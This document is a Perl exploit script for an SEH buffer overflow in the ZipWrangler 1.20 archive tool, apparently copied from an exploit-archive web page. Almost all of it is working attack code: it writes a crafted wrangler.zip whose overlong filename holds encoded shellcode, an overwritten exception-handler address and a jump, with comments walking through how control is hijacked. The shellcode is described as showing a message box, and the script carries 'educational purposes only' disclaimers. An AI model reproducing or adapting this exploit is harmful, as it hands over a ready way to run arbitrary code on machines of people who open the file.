扫码分享
验证:
体验盒子#!/usr/bin/perl
# Title:ZipWrangler 1.20 (.zip) SEH 0day exploit
# Author: TecR0c & Sud0
# Date: April 24th, 2010
# Corelan Reference:http://www.corelan.be:8800/advisories.php?id=CORELAN-10-031
# Download: http://www.softpedia.com/get/Compression-tools/ZipWrangler.shtml
# Platform: Windows XP sp3 En (VMWARE)
# Greetz to:Corelan Security Team
# http://www.corelan.be:8800/index.php/security/corelan-team-members/
#
# Script provided 'as is', without any warranty.
# Use for educational purposes only.
# Do not use this code to do anything illegal !
# Corelan does not want anyone to use this script
# for malicious and/or illegal purposes.
# Corelan cannot be held responsible for any illegal use.
#
# Note : you are not allowed to edit/modify this code.
# If you do, Corelan cannot be held responsible for any damages this may cause.
print "|-------------------------------------------------------------------|\n";
print "| __ __ |\n";
print "| _________________/ /___ _____ / /________ _____ ___ |\n";
print "|/ ___/ __ \/ ___/ _ \/ / __ `/ __ \ / __/ _ \/ __ `/ __ `__ \|\n";
print "| / /__/ /_/ / //__/ / /_/ / / / // /_/__/ /_/ / / / / / /|\n";
print "| \___/\____/_/ \___/_/\__,_/_/ /_/ \__/\___/\__,_/_/ /_/ /_/ |\n";
print "| |\n";
print "| http://www.corelan.be:8800|\n";
print "|security@corelan.be|\n";
print "| |\n";
print "|-------------------------------------------------[ EIP Hunters ]---|\n";
print "[+] ZipWrangler 1.2 (.zip) SEH exploit\n";
my $ldf_header = "\x50\x4B\x03\x04". # local signature
"\x14\x00". # version minimum needed to extract
"\x00\x00". #general purpose bit flag
"\x00\x00". #compression method
"\xB7\xAC". #file last modification time
"\xCE\x34". # file last modification date
"\x00\x00\x00\x00". #CRC32
"\x00\x00\x00\x00". #Compressed size
"\x00\x00\x00\x00" . #Uncompressed Size
"\x48\x10" .# filename length E4 0F
"\x00\x00"; #Extra filed length
my $cdf_header = "\x50\x4B\x01\x02". #Signature
"\x14\x00".#version made by
"\x14\x00".#version needed to extract
"\x00\x00".#general purpose bit flag
"\x00\x00".#Compression method
"\xB7\xAC".#File last modification time
"\xCE\x34".#File last modification date
"\x00\x00\x00\x00". #CRC32
"\x00\x00\x00\x00".#Compressed Size
"\x00\x00\x00\x00".#Uncompressed Size#
"\x48\x10". # filename length
"\x00\x00". #Extra Field Length
"\x00\x00". #File comment length
"\x00\x00". #Disk number where File starts
"\x01\x00". #Internal File Attributes
"\x24\x00\x00\x00". #External File Attributes
"\x00\x00\x00\x00"; #Relative offset of local file header;
my $eofcdf_header = "\x50\x4B\x05\x06". #End of central Directory Signature
"\x00\x00". #Number of this disk
"\x00\x00". #Disk where central directory starts
"\x01\x00". #Number of central directory records on this Disk
"\x01\x00". #Total Number of central directory records
"\x76\x10\x00\x00". #Size of central directory (bytes) (central directory header size + payload)
"\x66\x10\x00\x00". # Offset of start of central directory, relative to start archive(lfh + payload)
"\x00\x00"; #Zip file Comment length;
#mov edx, ds :[EAX] ---> the address 0x7FFDFD0C = 00000 in DS
#so EDX=0000, next instruction TEST EDX,EDX/ Jz xxxxxx (will bypass the error due to mov ECX, ds:[edx])
#the jump will take us to a retn (so we are out from handler routine) --> come back to execution
#0x77E9025B [rpcrt4.dll] will overwrite EIP after being back from exception
#bingo , after \xEB\x06 we are in our \xcc
# shell = message box eax e
my $shell="PYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8" .
"ABuJIn9JKmK9IT4tdl4tqzrmbpzUaIYcTNkpqfPlKD66lNkpvwlLKsvgx" .
"lKsNepNkEf4xpO4XPul3qIs1KaKOKQapLK2LgT14lKsuUlNkpTgurX6aZ" .
"JLK1ZwhLKCjepUQzKm3p7W9LKp4nkwqzNp1kOvQKpKLLlmTo0BTTJZahO4" .
"MuQKwxihqKOKOIoWKQlQ4Ux2UyNNkcjq4uQJKsVNk6lpKnkrzuL5QXkLKV" .
"dNkWqM8K9qT5tglE1XC82C8EyYDNi8eMY9RCXlNpN4NhlbryxMLKOKOKOl" .
"IqUfdOKQnN8YrPsMW7lddV2KXlKIoyoKOoycueXQxplPlEpkO3XP3VRfNu" .
"4qxpupscUcBK8qLutWzOyIvpVyoaEETMYO2pPMkoXY22mOLOwwlWTf2kXa" .
"NKOYokOSXPlpapnV83XQsbOT255P1kkoxaLQ4TGniKSBHQtShWPUpax0op" .
"iCD55PhpeqhRPbLUaJiNh2lEteYOykQdqKbSbQCv12rKOXP6QO0pPKOSeV" .
"h5ZA";
my $shellcode="A" x 2 . $shell . "A" x (4080-2-length($shell)) . "\x0C\xFD\xFD\x7F" . "\x90" x 4 . "\x5b\x02\xe9\x77" . "\x90" x 8 . "\x83\xC0\x16\xFF\xE0"."\xcc" x 59;
my $filename="wrangler.zip";
my $payload = $shellcode . ".txt";
print "Size : " . length($payload)."\n";
print "Removing old $filename file\n";
system("del $filename");
print "Creating new $filename file\n";
open(FILE, ">$filename");
print FILE $ldf_header . $payload . $cdf_header . $payload . $eofcdf_header;
close(FILE);
体验盒子
